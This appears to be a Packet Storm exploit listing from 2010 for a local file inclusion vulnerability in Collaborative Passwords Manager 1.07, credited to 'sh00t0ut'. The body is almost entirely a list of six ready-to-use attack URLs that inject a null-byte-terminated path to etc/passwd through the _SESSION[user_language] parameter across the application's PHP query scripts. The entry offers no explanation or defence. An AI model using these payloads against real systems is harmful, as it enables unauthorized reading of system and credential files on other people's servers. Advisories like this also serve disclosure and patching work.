Collaborative Passwords Manager 1.07 Local File Inclusion

2010-09-25T00:00:00
ID PACKETSTORM:94234
Type packetstorm
Reporter sh00t0ut
Modified 2010-09-25T00:00:00

Description

                                        
                                            `[~] Collaborative Passwords Manager 1.07 Multiple Local Include Exploit  
[~] Found by sh00t0ut  
[~] Expl:  
[~] Vendor: http://code.google.com/p/cpassman/downloads/list  
  
http://[victim]/?_SESSION[user_language]=[etc/passwd]%00  
http://[victim]/sources/admin.queries.php?_SESSION[user_language]=[etc/passwd]%00  
http://[victim]/sources/functions.queries.php?_SESSION[user_language]=[etc/passwd]%00  
http://[victim]/sources/views.queries.php?_SESSION[user_language]=[etc/passwd]%00  
http://[victim]/sources/groups.queries.php?_SESSION[user_language]=[etc/passwd]%00  
http://[victim]/sources/items.queries.php?_SESSION[user_language]=[etc/passwd]%00  
  
`